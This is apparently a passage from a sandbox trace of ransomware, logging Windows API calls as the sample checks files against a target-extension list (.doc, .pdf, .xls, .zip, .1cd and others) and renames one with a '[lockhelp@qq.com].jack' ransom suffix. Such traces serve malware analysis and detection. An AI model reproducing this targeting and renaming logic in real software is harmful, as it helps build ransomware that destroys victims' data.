(lpString="Content.xml") returned 11 [0199.221] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0199.223] GetFileSizeEx (in: hFile=0x41c, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=27045) returned 1 [0199.223] CloseHandle (hObject=0x41c) returned 1 [0199.223] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0x20 [0199.223] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.223] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0199.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0199.223] lstrlenW (lpString=".doc") returned 4 [0199.223] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.223] lstrlenW (lpString=".docx") returned 5 [0199.223] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0199.223] lstrlenW (lpString=".pdf") returned 4 [0199.223] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.223] lstrlenW (lpString=".xls") returned 4 [0199.223] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.223] lstrlenW (lpString=".xlsx") returned 5 [0199.224] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0199.224] lstrlenW (lpString=".ppt") returned 4 [0199.224] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0199.224] lstrlenW (lpString=".zip") returned 4 [0199.224] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.224] lstrlenW (lpString=".rar") returned 4 [0199.224] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.224] lstrlenW (lpString=".bz2") returned 4 [0199.224] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.224] lstrlenW (lpString=".7z") returned 3 [0199.224] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0199.224] lstrlenW (lpString=".dbf") returned 4 [0199.224] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0199.224] lstrlenW (lpString=".1cd") returned 4 [0199.224] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0199.224] lstrlenW (lpString=".jpg") returned 4 [0199.224] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0199.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0199.224] lstrlenW (lpString=".doc") returned 4 [0199.224] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.224] lstrlenW (lpString=".docx") returned 5 [0199.225] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0199.225] lstrlenW (lpString=".pdf") returned 4 [0199.225] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.225] lstrlenW (lpString=".xls") returned 4 [0199.225] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.225] lstrlenW (lpString=".xlsx") returned 5 [0199.225] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0199.225] lstrlenW (lpString=".ppt") returned 4 [0199.225] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0199.225] lstrlenW (lpString=".zip") returned 4 [0199.225] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.225] lstrlenW (lpString=".rar") returned 4 [0199.225] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.225] lstrlenW (lpString=".bz2") returned 4 [0199.225] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.225] lstrlenW (lpString=".7z") returned 3 [0199.225] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0199.225] lstrlenW (lpString=".dbf") returned 4 [0199.225] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0199.225] lstrlenW (lpString=".1cd") returned 4 [0199.225] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0199.225] lstrlenW (lpString=".jpg") returned 4 [0199.225] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.226] lstrcmpiW (lpString1=".avi", lpString2=".jack") returned -1 [0199.226] lstrlenW (lpString="boxed-correct.avi") returned 17 [0199.226] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0199.250] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=111320) returned 1 [0199.251] CloseHandle (hObject=0x434) returned 1 [0199.251] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0x20 [0199.251] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.255] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0199.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0199.255] lstrlenW (lpString=".doc") returned 4 [0199.255] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0199.255] lstrlenW (lpString=".docx") returned 5 [0199.255] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0199.255] lstrlenW (lpString=".pdf") returned 4 [0199.255] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0199.255] lstrlenW (lpString=".xls") returned 4 [0199.255] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0199.255] lstrlenW (lpString=".xlsx") returned 5 [0199.255] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0199.255] lstrlenW (lpString=".ppt") returned 4 [0199.255] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0199.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0199.256] lstrlenW (lpString=".zip") returned 4 [0199.256] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0199.256] lstrlenW (lpString=".rar") returned 4 [0199.256] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0199.256] lstrlenW (lpString=".bz2") returned 4 [0199.256] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0199.256] lstrlenW (lpString=".7z") returned 3 [0199.256] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0199.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0199.256] lstrlenW (lpString=".dbf") returned 4 [0199.256] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0199.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0199.256] lstrlenW (lpString=".1cd") returned 4 [0199.256] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0199.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0199.256] lstrlenW (lpString=".jpg") returned 4 [0199.256] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0199.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0199.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0199.256] lstrlenW (lpString=".doc") returned 4 [0199.257] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0199.257] lstrlenW (lpString=".docx") returned 5 [0199.257] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0199.257] lstrlenW (lpString=".pdf") returned 4 [0199.257] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0199.257] lstrlenW (lpString=".xls") returned 4 [0199.257] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0199.257] lstrlenW (lpString=".xlsx") returned 5 [0199.257] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0199.257] lstrlenW (lpString=".ppt") returned 4 [0199.257] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0199.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0199.257] lstrlenW (lpString=".zip") returned 4 [0199.257] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0199.257] lstrlenW (lpString=".rar") returned 4 [0199.257] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0199.257] lstrlenW (lpString=".bz2") returned 4 [0199.257] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0199.257] lstrlenW (lpString=".7z") returned 3 [0199.257] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0199.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0199.257] lstrlenW (lpString=".dbf") returned 4 [0199.257] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0199.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0199.257] lstrlenW (lpString=".1cd") returned 4 [0199.257] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0199.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0199.258] lstrlenW (lpString=".jpg") returned 4 [0199.258] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0199.258] lstrcmpiW (lpString1=".avi", lpString2=".jack") returned -1 [0199.258] lstrlenW (lpString="boxed-split.avi") returned 15 [0199.258] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0199.259] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=84190) returned 1 [0199.259] CloseHandle (hObject=0x3d4) returned 1 [0199.259] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0x20 [0199.259] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.259] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0199.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0199.260] lstrlenW (lpString=".doc") returned 4 [0199.260] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0199.260] lstrlenW (lpString=".docx") returned 5 [0199.260] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0199.260] lstrlenW (lpString=".pdf") returned 4 [0199.260] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0199.260] lstrlenW (lpString=".xls") returned 4 [0199.260] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0199.260] lstrlenW (lpString=".xlsx") returned 5 [0199.260] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0199.260] lstrlenW (lpString=".ppt") returned 4 [0199.260] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0199.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0199.260] lstrlenW (lpString=".zip") returned 4 [0199.260] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0199.260] lstrlenW (lpString=".rar") returned 4 [0199.260] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0199.260] lstrlenW (lpString=".bz2") returned 4 [0199.260] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0199.260] lstrlenW (lpString=".7z") returned 3 [0199.260] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0199.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0199.260] lstrlenW (lpString=".dbf") returned 4 [0199.260] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0199.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0199.260] lstrlenW (lpString=".1cd") returned 4 [0199.261] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0199.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0199.261] lstrlenW (lpString=".jpg") returned 4 [0199.261] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0199.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0199.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0199.261] lstrlenW (lpString=".doc") returned 4 [0199.261] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0199.261] lstrlenW (lpString=".docx") returned 5 [0199.261] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0199.261] lstrlenW (lpString=".pdf") returned 4 [0199.261] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0199.261] lstrlenW (lpString=".xls") returned 4 [0199.261] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0199.261] lstrlenW (lpString=".xlsx") returned 5 [0199.261] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0199.261] lstrlenW (lpString=".ppt") returned 4 [0199.261] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0199.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0199.261] lstrlenW (lpString=".zip") returned 4 [0199.261] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0199.261] lstrlenW (lpString=".rar") returned 4 [0199.261] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0199.261] lstrlenW (lpString=".bz2") returned 4 [0199.261] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0199.261] lstrlenW (lpString=".7z") returned 3 [0199.262] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0199.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0199.262] lstrlenW (lpString=".dbf") returned 4 [0199.262] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0199.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0199.262] lstrlenW (lpString=".1cd") returned 4 [0199.262] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0199.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0199.262] lstrlenW (lpString=".jpg") returned 4 [0199.262] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0199.262] lstrcmpiW (lpString1=".avi", lpString2=".jack") returned -1 [0199.262] lstrlenW (lpString="correct.avi") returned 11 [0199.262] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0199.263] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=180172) returned 1 [0199.263] CloseHandle (hObject=0x3d4) returned 1 [0199.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi")) returned 0x20 [0199.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.269] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0199.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0199.273] lstrlenW (lpString=".doc") returned 4 [0199.273] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0199.273] lstrlenW (lpString=".docx") returned 5 [0199.273] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0199.273] lstrlenW (lpString=".pdf") returned 4 [0199.273] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0199.273] lstrlenW (lpString=".xls") returned 4 [0199.273] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0199.273] lstrlenW (lpString=".xlsx") returned 5 [0199.273] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0199.273] lstrlenW (lpString=".ppt") returned 4 [0199.273] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0199.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0199.273] lstrlenW (lpString=".zip") returned 4 [0199.273] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0199.273] lstrlenW (lpString=".rar") returned 4 [0199.273] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0199.273] lstrlenW (lpString=".bz2") returned 4 [0199.273] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0199.273] lstrlenW (lpString=".7z") returned 3 [0199.274] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0199.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0199.274] lstrlenW (lpString=".dbf") returned 4 [0199.274] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0199.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0199.274] lstrlenW (lpString=".1cd") returned 4 [0199.274] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0199.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0199.274] lstrlenW (lpString=".jpg") returned 4 [0199.274] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0199.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0199.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0199.274] lstrlenW (lpString=".doc") returned 4 [0199.274] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0199.274] lstrlenW (lpString=".docx") returned 5 [0199.274] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0199.274] lstrlenW (lpString=".pdf") returned 4 [0199.274] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0199.274] lstrlenW (lpString=".xls") returned 4 [0199.274] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0199.274] lstrlenW (lpString=".xlsx") returned 5 [0199.274] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0199.274] lstrlenW (lpString=".ppt") returned 4 [0199.274] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0199.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0199.274] lstrlenW (lpString=".zip") returned 4 [0199.275] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0199.275] lstrlenW (lpString=".rar") returned 4 [0199.275] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0199.275] lstrlenW (lpString=".bz2") returned 4 [0199.275] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0199.275] lstrlenW (lpString=".7z") returned 3 [0199.275] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0199.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0199.275] lstrlenW (lpString=".dbf") returned 4 [0199.275] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0199.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0199.275] lstrlenW (lpString=".1cd") returned 4 [0199.275] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0199.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0199.275] lstrlenW (lpString=".jpg") returned 4 [0199.275] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0199.275] lstrcmpiW (lpString1=".avi", lpString2=".jack") returned -1 [0199.275] lstrlenW (lpString="split.avi") returned 9 [0199.275] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0199.315] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=181964) returned 1 [0199.315] CloseHandle (hObject=0x430) returned 1 [0199.316] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi")) returned 0x20 [0199.316] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.316] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0199.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0199.316] lstrlenW (lpString=".doc") returned 4 [0199.316] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0199.316] lstrlenW (lpString=".docx") returned 5 [0199.316] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0199.316] lstrlenW (lpString=".pdf") returned 4 [0199.316] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0199.316] lstrlenW (lpString=".xls") returned 4 [0199.316] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0199.316] lstrlenW (lpString=".xlsx") returned 5 [0199.316] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0199.316] lstrlenW (lpString=".ppt") returned 4 [0199.316] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0199.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0199.316] lstrlenW (lpString=".zip") returned 4 [0199.316] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0199.317] lstrlenW (lpString=".rar") returned 4 [0199.317] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0199.317] lstrlenW (lpString=".bz2") returned 4 [0199.317] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0199.317] lstrlenW (lpString=".7z") returned 3 [0199.317] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0199.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0199.317] lstrlenW (lpString=".dbf") returned 4 [0199.317] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0199.445] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.id-b4197730.[lockhelp@qq.com].jack")) returned 0 [0199.799] SetFilePointerEx (in: hFile=0x404, 